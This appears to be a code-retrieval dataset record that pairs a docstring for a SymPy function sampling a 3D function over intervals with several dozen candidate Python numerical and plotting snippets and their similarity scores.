"def plot(self, a=None, b=None):\n\n # === choose reasonable interval if [a, b] not specified === #\n if a is None:\n a = self.observations.min() - self.observations.std()\n if b is None:\n b = self.observations.max() + self.observations.std()\n\n # === generate plot === #\n x_vals = np.linspace(a, b, num=100)\n f = np.vectorize(self.__call__)\n plt.plot(x_vals, f(x_vals))\n plt.show()",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x):\n return x * np.sin(x)",
"def f(x, y):\n raise NotImplementedError",
"def lin_interpol(x_p, y_p):\r\n f = np.zeros([ x_p.shape[0] - 1 , 4 ]) # Coefficents and interval array\r\n \r\n for i in range( x_p.shape[0] - 1 ): # for every x[i], x[i+1] pair\r\n \r\n x_coeff = (y_p[i+1] - y_p[i]) / (x_p[i+1] - x_p[i])\r\n const = (x_p[i+1]*y_p[i] - x_p[i]*y_p[i+1] ) / (x_p[i+1] - x_p[i])\r\n \r\n # save the x coefficent, constant and the interval for this line\r\n f[i,:] = x_coeff, const, x_p[i], x_p[i+1]\r\n \r\n for a, b, start, end in f: # for every line fitted\r\n line_x = np.linspace( start, end, 3) # points to plot in x_range\r\n line_y = line_x * a + b # find the fitted line value at these points\r\n plt.plot(line_x,line_y,'k--', lw = 1, label = 'Linear' if a==f[0][0] else \"\") # only label one plot\r",
"def rectangular_integral(f, xrange, intervals):\n int_out = 0\n delta_x = (max(xrange)-min(xrange))/intervals\n new_xrange = np.linspace(min(xrange), max(xrange), intervals)\n for x in new_xrange:\n int_out += f(x)\n return delta_x*int_out",
"def plot_f(self, samples=0, plot_limits=None, which_data='all', which_functions='all', resolution=None, full_cov=False):\n if which_functions=='all':\n which_functions = [True]*self.kern.Nparts\n if which_data=='all':\n which_data = slice(None)\n\n if self.X.shape[1] == 1:\n Xnew, xmin, xmax = x_frame1D(self.X, plot_limits=plot_limits)\n if samples == 0:\n m,v = self._raw_predict(Xnew, slices=which_functions)\n gpplot(Xnew,m,m-2*np.sqrt(v),m+2*np.sqrt(v))\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n else:\n m,v = self._raw_predict(Xnew, slices=which_functions,full_cov=True)\n Ysim = np.random.multivariate_normal(m.flatten(),v,samples)\n gpplot(Xnew,m,m-2*np.sqrt(np.diag(v)[:,None]),m+2*np.sqrt(np.diag(v))[:,None])\n for i in range(samples):\n pb.plot(Xnew,Ysim[i,:],Tango.colorsHex['darkBlue'],linewidth=0.25)\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n pb.xlim(xmin,xmax)\n ymin,ymax = min(np.append(self.likelihood.Y,m-2*np.sqrt(np.diag(v)[:,None]))), max(np.append(self.likelihood.Y,m+2*np.sqrt(np.diag(v)[:,None])))\n ymin, ymax = ymin - 0.1*(ymax - ymin), ymax + 0.1*(ymax - ymin)\n pb.ylim(ymin,ymax)\n if hasattr(self,'Z'):\n pb.plot(self.Z,self.Z*0+pb.ylim()[0],'r|',mew=1.5,markersize=12)\n\n elif self.X.shape[1] == 2:\n resolution = resolution or 50\n Xnew, xmin, xmax, xx, yy = x_frame2D(self.X, plot_limits,resolution)\n m,v = self._raw_predict(Xnew, slices=which_functions)\n m = m.reshape(resolution,resolution).T\n pb.contour(xx,yy,m,vmin=m.min(),vmax=m.max(),cmap=pb.cm.jet)\n pb.scatter(Xorig[:,0],Xorig[:,1],40,Yorig,linewidth=0,cmap=pb.cm.jet,vmin=m.min(), vmax=m.max())\n pb.xlim(xmin[0],xmax[0])\n pb.ylim(xmin[1],xmax[1])\n else:\n raise NotImplementedError, \"Cannot define a frame with more than two input dimensions\"",
"def create_fig_2d(self, data_array_2d, output_fn='', xlabel='', ylabel='', title=''):",
"def test_float64(self):\r\n start, stop, step = dscalars('start', 'stop', 'step')\r\n out = arange(start, stop, step)\r\n f = function([start, stop, step], out)\r\n\r\n assert out.dtype == start.type.dtype\r\n arg_vals = [(0, 5, 1), (2, 11, 4), (-5, 1.1, 1.2), (1.3, 2,\r\n -2.1), (10, 2, 2)]\r\n for arg_v in arg_vals:\r\n start_v, stop_v, step_v = arg_v\r\n start_v_, stop_v_, step_v_ = numpy.asarray(arg_v,\r\n dtype=start.type.dtype)\r\n f_val = f(start_v_, stop_v_, step_v_)\r\n if config.cast_policy == 'custom':\r\n expected_val = numpy.arange(start_v, stop_v, step_v,\r\n dtype=start.type.dtype)\r\n elif config.cast_policy in ('numpy', 'numpy+floatX'):\r\n expected_val = numpy.arange(start_v_, stop_v_, step_v_)\r\n else:\r\n raise NotImplementedError(config.cast_policy)\r\n assert numpy.all(f_val == expected_val)",
"def _resample(x: np.ndarray, y: np.ndarray, n_samples: Optional[int]) -> Tuple[np.ndarray, np.ndarray]:\n if n_samples is None:\n n_samples = y.size\n new_x = np.linspace(x[0], x[1], n_samples)\n new_y = interp1d(x, y)(new_x)\n return new_x, new_y",
"def x_frame2D(X,plot_limits=None,resolution=None):\r\n assert X.shape[1] ==2, \"x_frame2D is defined for two-dimensional inputs\"\r\n if plot_limits is None:\r\n xmin,xmax = X.min(0),X.max(0)\r\n xmin, xmax = xmin-0.2*(xmax-xmin), xmax+0.2*(xmax-xmin)\r\n elif len(plot_limits)==2:\r\n xmin, xmax = plot_limits\r\n else:\r\n raise ValueError, \"Bad limits for plotting\"\r\n\r\n resolution = resolution or 50\r\n xx,yy = np.mgrid[xmin[0]:xmax[0]:1j*resolution,xmin[1]:xmax[1]:1j*resolution]\r\n Xnew = np.vstack((xx.flatten(),yy.flatten())).T\r\n return Xnew, xx, yy, xmin, xmax",
"def read_2d_analysis_data(f):\n \n data = np.transpose(np.loadtxt(f, dtype=np.float64))\n x = data[0]\n y = data[1]\n\n return x, y",
"def profileX(xdata, ydata, nbins, xrange=None, yrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err",
"def histogram2d(x, y, bins_x, bins_y):\n # x-range\n x_max, x_min = x.max(), x.min()\n delta_x = 1 / ((x_max - x_min) / bins_x)\n # y-range\n y_max, y_min = y.max(), y.min()\n delta_y = 1 / ((y_max - y_min) / bins_y)\n # compute histogram 2d\n xy_bin = np.zeros((np.int64(bins_x), np.int64(bins_y)), dtype=np.int64)\n for t in range(len(x)):\n i = (x[t] - x_min) * delta_x\n j = (y[t] - y_min) * delta_y\n if 0 <= i < bins_x and 0 <= j < bins_y:\n xy_bin[int(i), int(j)] += 1\n return xy_bin",
"def plot_dynamic_system(f, nb_sub=10, ax=None, xlim=[-1, 1], ylim=[-1, 1], scale=0.01,\n name=None, equal=False, **kwargs):\n\n Y, X = np.mgrid[ylim[0]:ylim[1]:complex(nb_sub), xlim[0]:xlim[\n 1]:complex(nb_sub)]\n mesh_data = np.vstack([X.ravel(), Y.ravel()])\n\n field = f(mesh_data.T).T\n\n U = field[0]\n V = field[1]\n U = U.reshape(nb_sub, nb_sub)\n V = V.reshape(nb_sub, nb_sub)\n speed = np.sqrt(U * U + V * V)\n\n if name is not None:\n plt.suptitle(name)\n\n if ax is not None:\n strm = ax.streamplot(X, Y, U, V, linewidth=scale * speed, **kwargs)\n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n\n if equal:\n ax.set_aspect('equal')\n\n else:\n strm = plt.streamplot(X, Y, U, V, linewidth=scale * speed, **kwargs)\n plt.xlim(xlim)\n plt.ylim(ylim)\n\n if equal:\n plt.axes().set_aspect('equal')\n\n return [strm]",
"def plot2dhist(xdata,ydata,cmap='binary',interpolation='nearest',\n fig=None,logscale=True,xbins=None,ybins=None,\n nbins=50,pts_only=False,**kwargs):\n\n setfig(fig)\n if pts_only:\n plt.plot(xdata,ydata,**kwargs)\n return\n\n ok = (~np.isnan(xdata) & ~np.isnan(ydata) & \n ~np.isinf(xdata) & ~np.isinf(ydata))\n if ~ok.sum() > 0:\n logging.warning('{} x values and {} y values are nan'.format(np.isnan(xdata).sum(),\n np.isnan(ydata).sum()))\n logging.warning('{} x values and {} y values are inf'.format(np.isinf(xdata).sum(),\n np.isinf(ydata).sum()))\n\n if xbins is not None and ybins is not None:\n H,xs,ys = np.histogram2d(xdata[ok],ydata[ok],bins=(xbins,ybins))\n else:\n H,xs,ys = np.histogram2d(xdata[ok],ydata[ok],bins=nbins) \n H = H.T\n\n if logscale:\n H = np.log(H)\n\n extent = [xs[0],xs[-1],ys[0],ys[-1]]\n plt.imshow(H,extent=extent,interpolation=interpolation,\n aspect='auto',cmap=cmap,origin='lower',**kwargs)",
"def lin_int(xs, ys):\n return scipy.interpolate.interp1d(xs, ys)",
"def drawLine2P(x,y,xlims):\n \n xrange = np.arange(xlims[0],xlims[1],1)\n A = np.vstack([x, np.ones(len(x))]).T\n k, b = np.linalg.lstsq(A, y, rcond=None)[0]\n return [xrange, k*xrange + b]",
"def axis2D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep):\n dislin.graf(xlow,xhigh,xfirst,xstep,\\\n ylow,yhigh,yfirst,ystep)",
"def f(x, alpha=0.80):\n n_particles = x.shape[0]\n #print('n_particles=' + str(n_particles))\n #print('x=' + str(x.shape))\n #print(x[0])\n j = [f_per_particle(x[i], alpha) for i in range(n_particles)]\n #print(j)\n return np.array(j)",
"def scale(x_range=1, y_range=1):\r\n x = rand_val(x_range)\r\n y = rand_val(y_range)\r\n return np.array(((x, 0, 0),\r\n (0, y, 0),\r\n (0, 0, 1)), dtype=np.float)",
"def gaussian2d(p, x, y):\n #2010-06-08 20:00 IJC: Created\n #2013-04-19 23:49 IJMC: Improved documentation, per BACM's request.\n \n x = array(x, dtype=float).copy()\n y = array(y, dtype=float).copy()\n p = array(p).copy()\n\n if len(p)==4:\n p = concatenate((p, [0]))\n\n z = p[4] + p[0]/(2*pi*p[1]**2) * exp(-((x-p[2])**2 + (y-p[3])**2) / (2*p[1]**2))\n \n return z",
"def parametric(\n self, *args, values=None,\n cmap=None, norm=None, interp=0,\n scalex=True, scaley=True,\n **kwargs\n ):\n # First error check\n # WARNING: So far this only works for 1D *x* and *y* coordinates.\n # Cannot draw multiple colormap lines at once\n if values is None:\n raise ValueError('Requires a \"values\" keyword arg.')\n if len(args) not in (1, 2):\n raise ValueError(f'Requires 1-2 arguments, got {len(args)}.')\n y = np.array(args[-1]).squeeze()\n x = np.arange(\n y.shape[-1]) if len(args) == 1 else np.array(args[0]).squeeze()\n values = np.array(values).squeeze()\n if x.ndim != 1 or y.ndim != 1 or values.ndim != 1:\n raise ValueError(\n f'x ({x.ndim}d), y ({y.ndim}d), and values ({values.ndim}d)'\n ' must be 1-dimensional.'\n )\n if len(x) != len(y) or len(x) != len(values) or len(y) != len(values):\n raise ValueError(\n f'{len(x)} xs, {len(y)} ys, but {len(values)} '\n ' colormap values.'\n )\n\n # Interpolate values to allow for smooth gradations between values\n # (bins=False) or color switchover halfway between points (bins=True)\n # Then optionally interpolate the corresponding colormap values\n if interp > 0:\n xorig, yorig, vorig = x, y, values\n x, y, values = [], [], []\n for j in range(xorig.shape[0] - 1):\n idx = (\n slice(None, -1) if j + 1 < xorig.shape[0] - 1\n else slice(None))\n x.extend(np.linspace(\n xorig[j], xorig[j + 1], interp + 2)[idx].flat)\n y.extend(np.linspace(\n yorig[j], yorig[j + 1], interp + 2)[idx].flat)\n values.extend(np.linspace(\n vorig[j], vorig[j + 1], interp + 2)[idx].flat)\n x, y, values = np.array(x), np.array(y), np.array(values)\n coords = []\n levels = edges(values)\n for j in range(y.shape[0]):\n # Get x/y coordinates and values for points to the 'left' and\n # 'right' of each joint\n if j == 0:\n xleft, yleft = [], []\n else:\n xleft = [(x[j - 1] + x[j]) / 2, x[j]]\n yleft = [(y[j - 1] + y[j]) / 2, y[j]]\n if j + 1 == y.shape[0]:\n xright, yright = [], []\n else:\n xleft = xleft[:-1] # prevent repetition when joined with right\n yleft = yleft[:-1]\n xright = [x[j], (x[j + 1] + x[j]) / 2]\n yright = [y[j], (y[j + 1] + y[j]) / 2]\n pleft = np.stack((xleft, yleft), axis=1)\n pright = np.stack((xright, yright), axis=1)\n coords.append(np.concatenate((pleft, pright), axis=0))\n\n # Create LineCollection and update with values\n hs = mcollections.LineCollection(\n np.array(coords), cmap=cmap, norm=norm,\n linestyles='-', capstyle='butt', joinstyle='miter'\n )\n hs.set_array(np.array(values))\n hs.update({\n key: value for key, value in kwargs.items()\n if key not in ('color',)\n })\n\n # Add collection with some custom attributes\n self.add_collection(hs)\n self.autoscale_view(scalex=scalex, scaley=scaley)\n hs.values = values\n hs.levels = levels # needed for other functions some\n return hs",
"def find_fmin_on_grid(f, xs, args, full_output):\n Nx = len(xs)\n Jout = np.zeros(Nx)\n for k in range(Nx):\n Jout[k] = f(xs[k], *args)\n idx = np.nanargmin(Jout)\n if not full_output:\n return xs[idx], Jout[idx]\n return xs[idx], Jout[idx], xs, Jout",
"def __init__(self, size=60, n=2, gamma=10, limit=15):\n self.n = n\n self.gamma = gamma\n self.limit = limit\n self.a = (1 / gamma) / (gamma - 1)\n\n x = np.arange(size)\n #endpoint=True breaks the plot of curve, \n #but allows work with [0, 1], not [0, 1) \n self.coord = []\n for i in x:\n for j in x:\n result = psi.inner_function((i / size, j / size), gamma, n)[0] \n self.coord.append((i, j, result))\n self.coord.sort(key=lambda x: x[2])\n self.x = np.array([i[0] for i in self.coord])\n self.y = np.array([i[1] for i in self.coord])",
"def map(self, f_list: List[Callable[[np.ndarray], int]], axis: int = 0, chunksize: int = 1000, selection: np.ndarray = None) -> List[np.ndarray]:\n\t\tif hasattr(f_list, '__call__'):\n\t\t\traise ValueError(\"f_list must be a list of functions, not a function itself\")\n\n\t\tresult = []\n\t\tif axis == 0:\n\t\t\trows_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[0]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[0]:\n\t\t\t\trows_per_chunk = min(self.shape[0] - ix, rows_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :][:, selection]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + rows_per_chunk] = np.apply_along_axis(f_list[i], 1, chunk)\n\t\t\t\tix = ix + rows_per_chunk\n\t\telif axis == 1:\n\t\t\tcols_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[1]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[1]:\n\t\t\t\tcols_per_chunk = min(self.shape[1] - ix, cols_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk][selection, :]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + cols_per_chunk] = np.apply_along_axis(f_list[i], 0, chunk)\n\t\t\t\tix = ix + cols_per_chunk\n\t\treturn result",
"def xy_mesh(nx, ny, x_min=0, x_max=1, y_min=0, y_max=1):\n\n\tx = np.linspace(x_min, x_max, nx)\n\ty = np.linspace(y_min, y_max, ny)\n\txv, yv = np.meshgrid(x, y)\n\t\n\treturn xv, yv",
"def plot(self, center=0, xmin=-1, xmax=1):\n if self.eps == 0:\n return [xmin, center, center, xmax], [0, 0, 1, 1]\n else:\n n = 200./self.eps\n x = concatenate(\n linspace(xmin, center-self.eps, 21),\n linspace(center-self.eps, center+self.eps, n+1),\n linspace(center+self.eps, xmax, 21))\n y = self(x)\n return x, y",
"def smoothSpectrum(f, X_f, r_oct):\n X_f_out = np.zeros(np.shape(X_f))\n for n in range(np.shape(f)[0]):\n # standard deviation\n sigma = f[n] / r_oct / np.pi\n # Gaussian window with the center frequnecy f[n] an dstandard deviation\n w = np.exp( -(f-f[n])**2 / (2*sigma**2) )\n w = w / np.sum(w, axis=0)\n X_f_out[n] = np.sum(w * X_f)\n \n return X_f_out",
"def testing_fixed_point_newton_interp(fixed_point_functions, n, m=400):\n\n # Function to convert to root finding problem given g(x). 'g(x*) = x*' -> 'f(x*) = 0'\n Ffun = lambda Gfun: lambda x: Gfun(x) -x\n\n import matplotlib.pylab as plt\n\n # setting up figure\n num_plots = len(fixed_point_functions)\n\n fig, axs = plt.subplots(1, num_plots, figsize=(15, 6), facecolor='w', edgecolor='k')\n fig.subplots_adjust(hspace = .5, wspace=.001)\n axs = axs.ravel()\n\n i = 0 # 'graph number'\n for Gfun_name, Gfun in fixed_point_functions.items():\n\n # <computation block>\n\n # convert to root finding problem\n f = Ffun(Gfun)\n\n # compute x and y data points\n x = np.linspace(-1,1,n)\n y = f(x)\n\n # compute coefficients of interpolating polynomial\n c = coeffients(x,y)\n\n # evaluate actual function points for graph\n ax = np.linspace(-1,1,m)\n ay = f(ax)\n\n # calculate y values using the interpolating polynomials coefficients\n y_hats = []\n for xi in ax:\n y_hati = np.polyval(c, xi)\n y_hats.append(y_hati)\n\n # <\\computation block>\n\n # create plot for this function\n axs[i].plot( ax, ay, 'k' ) # function in black\n axs[i].plot( ax, y_hats, 'r' ) # interpolating polynomial in red\n axs[i].set_title(Gfun_name)\n\n # increment graph number\n i += 1\n\n plt.show()",
"def projectionX(xdata, ydata, nbins, xrange=None, yrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out",
"def test_f_two_sample(self):\r\n\r\n # The expected values in this test are obtained through R.\r\n # In R the F test is var.test(x,y) different alternative hypotheses\r\n # can be specified (two sided, less, or greater).\r\n # The vectors are random samples from a particular normal distribution\r\n #(mean and sd specified).\r\n\r\n # a: 50 elem, mean=0 sd=1\r\n a = [-0.70701689, -1.24788845, -1.65516470, 0.10443876, -0.48526915,\r\n -0.71820656, -1.02603596, 0.03975982, -2.23404324, -0.21509363,\r\n 0.08438468, -0.01970062, -0.67907971, -0.89853667, 1.11137131,\r\n 0.05960496, -1.51172084, -0.79733957, -1.60040659, 0.80530639,\r\n -0.81715836, -0.69233474, 0.95750665, 0.99576429, -1.61340216,\r\n -0.43572590, -1.50862327, 0.92847551, -0.68382338, -1.12523522,\r\n -0.09147488, 0.66756023, -0.87277588, -1.36539039, -0.11748707,\r\n -1.63632578, -0.31343078, -0.28176086, 0.33854483, -0.51785630,\r\n 2.25360559, -0.80761191, 1.18983499, 0.57080342, -1.44601700,\r\n -0.53906955, -0.01975266, -1.37147915, -0.31537616, 0.26877544]\r\n\r\n # b: 50 elem, mean=0, sd=1.2\r\n b = [\r\n 0.081418743, 0.276571612, -\r\n 1.864316504, 0.675213612, -0.769202643,\r\n 0.140372825, -1.426250184, 0.058617884, -\r\n 0.819287409, -0.007701916,\r\n -0.782722020, -\r\n 0.285891593, 0.661980419, 0.383225191, 0.622444946,\r\n -0.192446150, 0.297150571, 0.408896059, -\r\n 0.167359383, -0.552381362,\r\n 0.982168338, 1.439730446, 1.967616101, -\r\n 0.579607307, 1.095590943,\r\n 0.240591302, -1.566937143, -\r\n 0.199091349, -1.232983905, 0.362378169,\r\n 1.166061081, -0.604676222, -\r\n 0.536560206, -0.303117595, 1.519222792,\r\n -0.319146503, 2.206220810, -\r\n 0.566351124, -0.720397392, -0.452001377,\r\n 0.250890097, 0.320685395, -\r\n 1.014632725, -3.010346273, -1.703955054,\r\n 0.592587381, -1.237451255, 0.172243366, -0.452641122, -0.982148581]\r\n\r\n # c: 60 elem, mean=5, sd=1\r\n c = [4.654329, 5.242129, 6.272640, 5.781779, 4.391241, 3.800752,\r\n 4.559463, 4.318922, 3.243020, 5.121280, 4.126385, 5.541131,\r\n 4.777480, 5.646913, 6.972584, 3.817172, 6.128700, 4.731467,\r\n 6.762068, 5.082983, 5.298511, 5.491125, 4.532369, 4.265552,\r\n 5.697317, 5.509730, 2.935704, 4.507456, 3.786794, 5.548383,\r\n 3.674487, 5.536556, 5.297847, 2.439642, 4.759836, 5.114649,\r\n 5.986774, 4.517485, 4.579208, 4.579374, 2.502890, 5.190955,\r\n 5.983194, 6.766645, 4.905079, 4.214273, 3.950364, 6.262393,\r\n 8.122084, 6.330007, 4.767943, 5.194029, 3.503136, 6.039079,\r\n 4.485647, 6.116235, 6.302268, 3.596693, 5.743316, 6.860152]\r\n\r\n # d: 30 elem, mean=0, sd =0.05\r\n d = [\r\n 0.104517366, 0.023039678, 0.005579091, 0.052928250, 0.020724823,\r\n -0.060823243, -0.019000890, -\r\n 0.064133996, -0.016321594, -0.008898334,\r\n -0.027626992, -0.051946186, 0.085269587, -\r\n 0.031190678, 0.065172938,\r\n -0.054628573, 0.019257306, -\r\n 0.032427056, -0.058767356, 0.030927400,\r\n 0.052247357, -\r\n 0.042954937, 0.031842104, 0.094130522, -0.024828465,\r\n 0.011320453, -0.016195062, 0.015631245, -0.050335598, -0.031658335]\r\n\r\n a, b, c, d = map(array, [a, b, c, d])\r\n self.assertEqual(map(len, [a, b, c, d]), [50, 50, 60, 30])\r\n\r\n # allowed error. This big, because results from R\r\n # are rounded at 4 decimals\r\n error = 1e-4\r\n\r\n self.assertFloatEqual(f_two_sample(a, a), (49, 49, 1, 1), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b), (49, 49, 0.8575, 0.5925),\r\n eps=error)\r\n self.assertFloatEqual(f_two_sample(b, a), (49, 49, 1.1662, 0.5925),\r\n eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b, tails='low'),\r\n (49, 49, 0.8575, 0.2963), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, b, tails='high'),\r\n (49, 49, 0.8575, 0.7037), eps=error)\r\n self.assertFloatEqual(f_two_sample(a, c),\r\n (49, 59, 0.6587, 0.1345), eps=error)\r\n # p value very small, so first check df's and F value\r\n self.assertFloatEqualAbs(f_two_sample(d, a, tails='low')[0:3],\r\n (29, 49, 0.0028), eps=error)\r\n assert f_two_sample(d, a, tails='low')[3] < 2.2e-16 # p value\r",
"def monte_carlo_integration(f, n, a, b, ret_arrays=False):\n x = np.random.uniform(0, 1, n)*(b-a)+a\n f_array = f(x)\n\n positive_x = x[f_array >= 0]\n negative_x = x[f_array < 0]\n if positive_x.size > 0:\n h = np.max(f_array)\n else:\n h = np.max(-f_array)\n \n y_positive = np.random.uniform(0, 1, positive_x.size)*h\n y_negative = np.random.uniform(0, 1, negative_x.size)*h\n \n xy_indices_below = y_positive <= f(positive_x)\n xy_indices_above = y_negative <= -f(negative_x)\n n_inside_below = y_positive[xy_indices_below]\n n_inside_above = -y_negative[xy_indices_above]\n \n if ret_arrays:\n n_inside_x = np.append(positive_x[xy_indices_below],negative_x[xy_indices_above])\n n_inside_y = np.append(n_inside_below, n_inside_above)\n return n_inside_x, n_inside_y\n \n return h*(b-a)*(n_inside_below.size-n_inside_above.size)/(n)",
"def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2",
"def vis_g(f1,f2):\n data = generator(fixed_noise).data.numpy()\n if np.isnan(data).any():\n return\n \n plt.scatter(data[:,f1], data[:,f2], alpha=0.2, c='b')\n plt.xlim(lims)\n plt.ylim(lims)",
"def plot_2d(self, x1: Union[Iterable, ndarray], x2: Union[Iterable, ndarray],\n color_map: str = 'viridis', ax: Axes = None) -> Axes:\n x1_grid, x2_grid = meshgrid(x1, x2)\n x1_x2 = dstack((x1_grid, x2_grid))\n f = self._method(x1_x2)\n ax = ax or new_axes()\n ax.contourf(x1_grid, x2_grid, f, cmap=color_map)\n ax.set_xlabel('x1')\n ax.set_ylabel('x2')\n return ax",
"def evaluate_random_function(f, x, y):\n # this section actually evaluates the functions \n\n if f[0] == \"x\":\n return x \n elif f[0] == \"y\":\n return y\n elif f[0] == \"sin_pi\":\n return math.sin(math.pi*evaluate_random_function(f[1], x, y ))\n elif f[0] == \"cos_pi\":\n return math.cos(math.pi*evaluate_random_function(f[1], x, y ))\n elif f[0] == \"prod\":\n return evaluate_random_function(f[1] , x , y ) * evaluate_random_function(f[2] , x , y )\n elif f[0] == \"avg\":\n return (evaluate_random_function(f[1] , x , y ) + evaluate_random_function(f[2] , x , y)) / 2.0\n elif f[0] == \"squ\":\n return evaluate_random_function(f[1] , x , y ) * evaluate_random_function(f[1] , x , y ) \n elif f[0] == \"cir\":\n return ((evaluate_random_function(f[1] , x , y )**2 + evaluate_random_function(f[2] , x , y)) **2 )**0.5\n elif f[0] == \"sms\":\n return (evaluate_random_function(f[1] , x , y )**2 - evaluate_random_function(f[2] , x , y)) **2 \n\n #elif f == [\"sinpi\"]:\n # return math.sin(math.pi*)",
"def histogram2d(x,y, bins=10, range=None, normed=False, weights=None):\r\n from numpy import histogramdd\r\n\r\n try:\r\n N = len(bins)\r\n except TypeError:\r\n N = 1\r\n\r\n if N != 1 and N != 2:\r\n xedges = yedges = asarray(bins, float)\r\n bins = [xedges, yedges]\r\n hist, edges = histogramdd([x,y], bins, range, normed, weights)\r\n return hist, edges[0], edges[1]"
] | [
"0.6939351",
"0.6302334",
"0.6178659",
"0.58382726",
"0.57627946",
"0.5739403",
"0.56020606",
"0.5559102",
"0.5487004",
"0.5467543",
"0.5426483",
"0.5417944",
"0.53844726",
"0.53342545",
"0.53172773",
"0.53114015",
"0.5287415",
"0.5252938",
"0.5250112",
"0.52382034",
"0.5224161",
"0.5208987",
"0.5190809",
"0.51832134",
"0.51677656",
"0.51570743",
"0.515311",
"0.5142582",
"0.513174",
"0.51237595",
"0.5091958",
"0.5085598",
"0.5073637",
"0.50731343",
"0.5066689",
"0.5061233",
"0.5058502",
"0.50511503",
"0.5049298",
"0.5049225",
"0.5043829",
"0.50145155",
"0.50048983",
"0.5001201",
"0.49840415",
"0.49836764",
"0.49792367",
"0.49741924",
"0.49686757",
"0.49514446",
"0.4930842",
"0.4920208",
"0.49107262",
"0.49102795",
"0.48981068",
"0.48970118",
"0.4890745",
"0.4883478",
"0.48804757",
"0.48777455",
"0.48757064",
"0.48660374",
"0.48660374",
"0.48660374",
"0.48660374",
"0.48511326",
"0.48501474",
"0.4841138",
"0.48366448",
"0.4808465",
"0.4804418",
"0.47917366",
"0.47907928",
"0.47902638",
"0.47868922",
"0.47718102",
"0.4769997",
"0.47679386",
"0.4760289",
"0.474371",
"0.47419068",
"0.4738349",
"0.47312126",
"0.47292277",
"0.4726683",
"0.47210777",
"0.47195193",
"0.47177273",
"0.47152424",
"0.4707087",
"0.47047737",
"0.4702921",
"0.47013605",
"0.47006968",
"0.46991614",
"0.46938",
"0.46927264",
"0.46864608",
"0.4686399",
"0.46809843"
] | 0.7971121 | 0 |
r""" Samples a 3d function f over specified intervals and returns three 2d arrays (X, Y, Z) suitable for plotting with matlab (matplotlib) syntax. See examples\mplot3d.py. f is a function of two variables, such as x2 + y2. x_args and y_args are intervals given in the form (var, min, max, n) | def sample3d(f, x_args, y_args):
x, x_min, x_max, x_n = None, None, None, None
y, y_min, y_max, y_n = None, None, None, None
try:
f = sympify(f)
except SympifyError:
raise ValueError("f could not be interpreted as a SymPy function")
try:
x, x_min, x_max, x_n = x_args
y, y_min, y_max, y_n = y_args
except (TypeError, IndexError):
raise ValueError("x_args and y_args must be tuples of the form (var, min, max, intervals)")
x_l = float(x_max - x_min)
x_d = x_l/float(x_n)
x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)
y_l = float(y_max - y_min)
y_d = y_l/float(y_n)
y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)
def meshgrid(x, y):
"""
Taken from matplotlib.mlab.meshgrid.
"""
x = np.array(x)
y = np.array(y)
numRows, numCols = len(y), len(x)
x.shape = 1, numCols
X = np.repeat(x, numRows, 0)
y.shape = numRows, 1
Y = np.repeat(y, numCols, 1)
return X, Y
X, Y = np.meshgrid(x_a, y_a)
Z = np.ndarray((len(X), len(X[0])))
for j in range(len(X)):
for k in range(len(X[0])):
try:
Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))
except (TypeError, NotImplementedError):
Z[j][k] = 0
